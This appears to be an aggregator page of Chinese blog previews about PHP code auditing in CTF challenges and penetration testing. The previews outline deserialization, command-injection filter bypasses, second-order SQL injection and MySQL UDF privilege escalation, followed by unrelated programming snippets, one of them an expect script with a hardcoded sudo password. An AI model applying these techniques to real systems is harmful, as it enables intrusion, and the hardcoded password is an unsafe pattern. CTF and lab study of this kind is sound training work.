攻防世界web新手练习-unseping新版攻防世界的这个题目有点给力，从今天开始刷题刷题本题的知识点很多，总结出来以下几点php代码审计php反序列化命令执行的绕过方式空格绕过空环境变量绕过相关命令源码分析首先对源码进行分析method=$method;$this->args=$args;}//析构函数析构函数(destructor)与构造函数相反，当对象结束其生命周期时（例如对象所在的函数已调
【高级渗透篇】网络安全面试世界尽头与你 #渗透测试面试 web安全安全
【高级渗透篇】网络安全面试1.权限维持2.提权MySQL提权3.Java内存马4.代码安全Java代码审计PHP代码审计1.权限维持Linux权限维持方法论Windows权限维持方法论2.提权MySQL提权1、MySQLudf提权原理：MySQL可以通过创建UDF函数的方式来扩展其自定义的功能。如果UDF动态链接库中包含恶意代码，当MySQL数据库服务器加载这个恶意的UDF动态链接库时，这个恶意代
sqli-labs靶场详解less-24(二次注入) 网安小t SQL注入 sqli-labs靶场安全 web安全 sql 网络安全安全性测试
less-24对于一个像我一样的小白来说这关就像php代码审计一开始进行判断注入点的时候怎么都找不到一点思路都没有只能搜教程说是二次注入从来没遇见的题型于是从代码审计开始先说一下什么叫二次注入二次注入二次注入是指通过SQL语句存储到数据库的用户输入被读取后再次被SQL语句执行导致的注入。原理在第一次进行数据库插入数据的时候，仅仅只是使用了个别函数对其中的特殊字符进行了转义，在后端代码中可能被转义，
BUUCTF—[MRCTF2020]Ez_bypass1 热爱可抵岁月漫长_ php web安全
题目链接：BUUCTF在线评测一、知识点1.PHP代码审计2.MD5碰撞（强碰撞，"==="）3.PHP类型比较二、解题过程1.代码审计，打开题目链接后页面显示如下涉及的函数功能：$符号是PHP语言中用来表示变量的标识符整形变量:$age=25;字符串变量:$name="John";⚪include('flag.php')：执行结果：包含并运行指定的外部文件'flag.php'。返回值：无。如果文
PHP代码审计10—命令执行漏洞 W0ngk PHP代码审计 php 安全命令执行 CTF
文章目录一、命令执行漏洞基础1、漏洞概述与原理2、漏洞检测3、常见命令拼接符4、常见防御方法绕过1）空格过滤绕过2）黑名单绕过3）命令无回显绕过二、CTF例题分析1、BUUCTF2018Onlinetool2、CTF.showweb31三、参考资料一、命令执行漏洞基础1、漏洞概述与原理应用程序有时需要调用一些执行系统命令的函数，如在PHP中，使用system、exec、shell_exec、pas
熊海CMS 靶场 diaobusi-puls 网络安全专栏 CMS靶场安全网络
熊海CMS靶场0x01前言初步了解cms，ContentManagementSystem内容管理系统。它是一种用于创建、编辑、管理和发布内容的软件程序或工具。内容管理系统通常用于网站、博客、企业内部系统等各种应用中，可以帮助用户管理和发布各种类型的内容，如文章、图片、视频、文件等。进行PHP代码审计，代码审计是一种白盒测试，以发现程序错误，安全漏洞和违反程序规范为目标的源代码分析。软件代码审计是对
通过一道题目带你深入了解WAF特性、PHP超级打印函数、ASCII码chr()对应表等原理[RoarCTF 2019]Easy Calc 1 白猫a٩ CTF做题笔记 php 开发语言 web安全网络安全后端前端 android
题目环境：依此输入以下内容并查看回显结果1+11’index.phpls到这里没思路了F12查看源代码一定要仔细看啊，差点没找到，笑哭访问calc.php文件果然有点东西PHP代码审计error_reporting(0);关闭错误报告通过GET方式传参的参数numshow_source函数将文件内容显示出来参数num的值赋值给变量str创建一个了名为blacklist的数组，该数组包含一系列字符，
攻防世界新手练习区——unseping Redemption8 Ctf刷题 php ctf 网络安全
目录知识点解读题目源码：命令绕过知识点PHP代码审计PHP序列化和反序列化PHP中魔术方法命令执行绕过方式解读题目源码：这道题首先一上来就是一段PHP代码，其中看到unserialize()就知道考的是反序列化，但是我们再往上看代码会发现还有命令执行绕过的知识点。做出这道题的第一步就是能够理清代码执行顺序和各个函数的功能。接下来我们先分析一下源码。method=$method;$this->arg
[网鼎杯 2020 青龙组]AreUSerialz 1 bazzza 学习后端 php 安全 http
打开靶场，是一道php代码审计的题目,是个反序列化的题目分块对代码进行分析，先分析输入部分functionis_valid($s){for($i=0;$i=32&&ord($s[$i])<=125))//限制字符串的范围returnfalse;returntrue;}if(isset($_GET{'str'})){$str=
“零基础”PHP代码审计入门渗透测试老鸟-九青代码审计 android 安全 php
目录一、代码审计目的二、代码审计基础三、代码审计思路四、PHP核心配置五、代码审计环境六、手动调试代码七、PHP的弱类型八、学习漏洞函数九、审计入门总结推荐一些demo：一、代码审计目的代码审计指的是对源代码进行检查，寻找代码中的bug以及安全缺陷(漏洞)。代码审计这是一个需要多方面技能的技术，也是需要一定的知识储备。我们需要掌握编程，安全工具的使用、漏洞原理、漏洞的修复方式、函数的缺陷等等，如果
ctf-web ch1762 ctf
ctf-web信息搜集认证绕过SQL注入文件上传文件包含PHP代码审计信息搜集源码泄露页面源代码敏感文件泄漏备份文件(.swp/.bak/.beifen/~/phps等)[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)]数
buuctf[极客大挑战 2019]Havefun 1 白猫a٩ CTF做题笔记网络安全 php web安全
网页环境title标题每一帧都不要放过，或许那个不起眼的地方就存在重要信息到这并未发现什么重要信息，F12看看在源代码底部发现PHP代码：PHP代码审计通过GET方式进行传参（就是通过URL地址进行传参)，这个参数是cat输出参数cat的值if判断语句，当cat=dog的时候即可输出flag构造payload：url/?cat=dog爆出flag：
jsonp 常用util方法 hw1287789687 jsonp jsonp常用方法 jsonp callback
jsonp 常用java方法 (1)以jsonp的形式返回:函数名(json字符串) /*** * 用于jsonp调用 * @param map : 用于构造json数据 * @param callback : 回调的javascript方法名 * @param filters : <code>SimpleBeanPropertyFilter theFilt
多线程场景 alafqq 多线程
0 能不能简单描述一下你在java web开发中需要用到多线程编程的场景？0 对多线程有些了解，但是不太清楚具体的应用场景，能简单说一下你遇到的多线程编程的场景吗？ Java多线程 2012年11月23日 15:41 Young9007 Young9007 4 0 0 4 Comment添加评论关注(2) 3个答案按时间排序按投票排序 0 0 最典型的如： 1、
Maven学习——修改Maven的本地仓库路径 Kai_Ge maven
安装Maven后我们会在用户目录下发现.m2 文件夹。默认情况下，该文件夹下放置了Maven本地仓库.m2/repository。所有的Maven构件(artifact)都被存储到该仓库中，以方便重用。但是windows用户的操作系统都安装在C盘，把Maven仓库放到C盘是很危险的，为此我们需要修改Maven的本地仓库路径。
placeholder的浏览器兼容 120153216 placeholder
【前言】自从html5引入placeholder后，问题就来了，不支持html5的浏览器也先有这样的效果，各种兼容，之前考虑，今天测试人员逮住不放，想了个解决办法，看样子还行，记录一下。【原理】不使用placeholder，而是模拟placeholder的效果，大概就是用focus和focusout效果。【代码】 <scrip
debian_用iso文件创建本地apt源 2002wmj Debian
1.将N个debian-506-amd64-DVD-N.iso存放于本地或其他媒介内，本例是放在本机/iso/目录下 2.创建N个挂载点目录如下： debian:~#mkdir –r /media/dvd1 debian:~#mkdir –r /media/dvd2 debian:~#mkdir –r /media/dvd3 …. debian:~#mkdir –r /media
SQLSERVER耗时最长的SQL 357029540 SQL Server
对于DBA来说，经常要知道存储过程的某些信息： 1. 执行了多少次 2. 执行的执行计划如何 3. 执行的平均读写如何 4. 执行平均需要多少时间列名 &
com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 7454103 eclipse
今天eclipse突然报了com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 错误，并且工程文件打不开了，在网上找了一下资料，然后按照方法操作了一遍，好了，解决方法如下：错误提示信息： An error has occurred.See error log for more details. Reason: com/genuitec/
用正则删除文本中的html标签 adminjun java html 正则表达式去掉html标签
使用文本编辑器录入文章存入数据中的文本是HTML标签格式，由于业务需要对HTML标签进行去除只保留纯净的文本内容，于是乎Java实现自动过滤。如下： public static String Html2Text(String inputString) { String htmlStr = inputString; // 含html标签的字符串 String textSt
嵌入式系统设计中常用总线和接口 aijuans linux 基础
嵌入式系统设计中常用总线和接口任何一个微处理器都要与一定数量的部件和外围设备连接，但如果将各部件和每一种外围设备都分别用一组线路与CPU直接连接，那么连线
Java函数调用方式——按值传递 ayaoxinchao java 按值传递对象基础数据类型
Java使用按值传递的函数调用方式，这往往使我感到迷惑。因为在基础数据类型和对象的传递上，我就会纠结于到底是按值传递，还是按引用传递。其实经过学习，Java在任何地方，都一直发挥着按值传递的本色。首先，让我们看一看基础数据类型是如何按值传递的。 public static void main(String[] args) { int a = 2;
ios音量线性下降 bewithme ios音量
直接上代码吧 //second 几秒内下降为0 - (void)reduceVolume:(int)second { KGVoicePlayer *player = [KGVoicePlayer defaultPlayer]; if (!_flag) { _tempVolume = player.volume;
与其怨它不如爱它 bijian1013 选择理想职业规划
抱怨工作是年轻人的常态，但爱工作才是积极的心态，与其怨它不如爱它。一般来说，在公司干了一两年后，不少年轻人容易产生怨言，除了具体的埋怨公司“扭门”，埋怨上司无能以外，也有许多人是因为根本不爱自已的那份工作，工作完全成了谋生的手段，跟自已的性格、专业、爱好都相差甚远。
一边时间不够用一边浪费时间 bingyingao 工作时间浪费
一方面感觉时间严重不够用，另一方面又在不停的浪费时间。每一个周末，晚上熬夜看电影到凌晨一点，早上起不来一直睡到10点钟，10点钟起床，吃饭后玩手机到下午一点。精神还是很差，下午像一直野鬼在城市里晃荡。为何不尝试晚上10点钟就睡，早上7点就起，时间完全是一样的，把看电影的时间换到早上，精神好，气色好，一天好状态。控制让自己周末早睡早起，你就成功了一半。有多少个工作
【Scala八】Scala核心二：隐式转换 bit1129 scala
Implicits work like this: if you call a method on a Scala object, and the Scala compiler does not see a definition for that method in the class definition for that object, the compiler will try to con
sudoku slover in Haskell (2) bookjovi haskell sudoku
继续精简haskell版的sudoku程序，稍微改了一下，这次用了8行，同时性能也提高了很多，对每个空格的所有解不是通过尝试算出来的，而是直接得出。 board = [0,3,4,1,7,0,5,0,0, 0,6,0,0,0,8,3,0,1, 7,0,0,3,0,0,0,0,6, 5,0,0,6,4,0,8,0,7,
Java-Collections Framework学习与总结-HashSet和LinkedHashSet BrokenDreams linkedhashset
本篇总结一下两个常用的集合类HashSet和LinkedHashSet。它们都实现了相同接口java.util.Set。Set表示一种元素无序且不可重复的集合；之前总结过的java.util.List表示一种元素可重复且有序
读《研磨设计模式》-代码笔记-备忘录模式-Memento bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; /* * 备忘录模式的功能是，在不破坏封装性的前提下，捕获一个对象的内部状态，并在对象之外保存这个状态，为以后的状态恢复作“备忘”
《RAW格式照片处理专业技法》笔记 cherishLC PS
注意，这不是教程！仅记录楼主之前不太了解的一、色彩（空间）管理作者建议采用ProRGB（色域最广），但camera raw中设为ProRGB，而PS中则在ProRGB的基础上，将gamma值设为了1.8（更符合人眼）注意：bridge、camera raw怎么设置显示、输出的颜色都是正确的（会读取文件内的颜色配置文件），但用PS输出jpg文件时，必须先用Edit->conv
使用 Git 下载 Spring 源码编译 for Eclipse crabdave eclipse
使用 Git 下载 Spring 源码编译 for Eclipse 1、安装gradle，下载 http://www.gradle.org/downloads 配置环境变量GRADLE_HOME，配置PATH %GRADLE_HOME%/bin，cmd，gradle -v 2、spring4 用jdk8 下载 https://jdk8.java.
mysql连接拒绝问题 daizj mysql 登录权限
mysql中在其它机器连接mysql服务器时报错问题汇总一、[running][email protected]:~$mysql -uroot -h 192.168.9.108 -p //带-p参数，在下一步进行密码输入 Enter password: //无字符串输入 ERROR 1045 (28000): Access
Google Chrome 为何打压 H.264 dsjt apple html5 chrome Google
Google 今天在 Chromium 官方博客宣布由于 H.264 编解码器并非开放标准，Chrome 将在几个月后正式停止对 H.264 视频解码的支持，全面采用开放的 WebM 和 Theora 格式。 Google 在博客上表示，自从 WebM 视频编解码器推出以后，在性能、厂商支持以及独立性方面已经取得了很大的进步，为了与 Chromium 现有支持的編解码器保持一致，Chrome
yii 获取控制器名和方法名 dcj3sjt126com yii framework
1. 获取控制器名在控制器中获取控制器名: $name = $this->getId(); 在视图中获取控制器名: $name = Yii::app()->controller->id; 2. 获取动作名在控制器beforeAction()回调函数中获取动作名: $name =
Android知识总结（二） come_for_dream android
明天要考试了，速速总结如下 1、Activity的启动模式 standard：每次调用Activity的时候都创建一个（可以有多个相同的实例，也允许多个相同Activity叠加。） singleTop：可以有多个实例，但是不允许多个相同Activity叠加。即，如果Ac
高洛峰收徒第二期：寻找未来的“技术大牛” ——折腾一年，奖励20万元 gcq511120594 工作项目管理
高洛峰，兄弟连IT教育合伙人、猿代码创始人、PHP培训第一人、《细说PHP》作者、软件开发工程师、《IT峰播》主创人、PHP讲师的鼻祖！首期现在的进程刚刚过半，徒弟们真的很棒，人品都没的说，团结互助，学习刻苦，工作认真积极，灵活上进。我几乎会把他们全部留下来，现在已有一多半安排了实际的工作，并取得了很好的成绩。等他们出徒之日，凭他们的能力一定能够拿到高薪，而且我还承诺过一个徒弟，当他拿到大学毕
linux expect heipark expect
1. 创建、编辑文件go.sh #!/usr/bin/expect spawn sudo su admin expect "*password*" { send "13456\r\n" } interact 2. 设置权限 chmod u+x go.sh 3.
Spring4.1新特性——静态资源处理增强 jinnianshilongnian spring 4.1
目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
idea ubuntuxia 乱码 liyonghui160com
1.首先需要在windows字体目录下或者其它地方找到simsun.ttf 这个字体文件。 2.在ubuntu 下可以执行下面操作安装该字体： sudo mkdir /usr/share/fonts/truetype/simsun sudo cp simsun.ttf /usr/share/fonts/truetype/simsun fc-cache -f -v
改良程序的11技巧 pda158 技巧
有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点，程序你只写一次，但以后会无数次的阅读。当你第二天回头来看你的代码时，你就要开始阅读它了。当你把代码拿给其他人看时，他必须阅读你的代码。因此，在编写时多花一点时间，你会在阅读它时节省大量的时间。让我们看一些基本的编程技巧：尽量保持方法简短永远永远不要把同一个变量用于多个不同的
300个涵盖IT各方面的免费资源（下）——工作与学习篇 shoothao 创业免费资源学习课程远程工作
工作与生产效率: A. 背景声音 Noisli:背景噪音与颜色生成器。 Noizio:环境声均衡器。 Defonic:世界上任何的声响都可混合成美丽的旋律。 Designers.mx:设计者为设计者所准备的播放列表。 Coffitivity:这里的声音就像咖啡馆里放的一样。 B. 避免注意力分散 Self Co
深入浅出RPC uule rpc
深入浅出RPC-浅出篇深入浅出RPC-深入篇 RPC Remote Procedure Call Protocol 远程过程调用协议它是一种通过网络从远程计算机程序上请求服务，而不需要了解底层网络技术的协议。RPC协议假定某些传输协议的存在，如TCP或UDP，为通信程序之间携带信息数据。在OSI网络通信模型中，RPC跨越了传输层和应用层。RPC使得开发

ctf中的php代码审计

你可能感兴趣的:(php代码审计)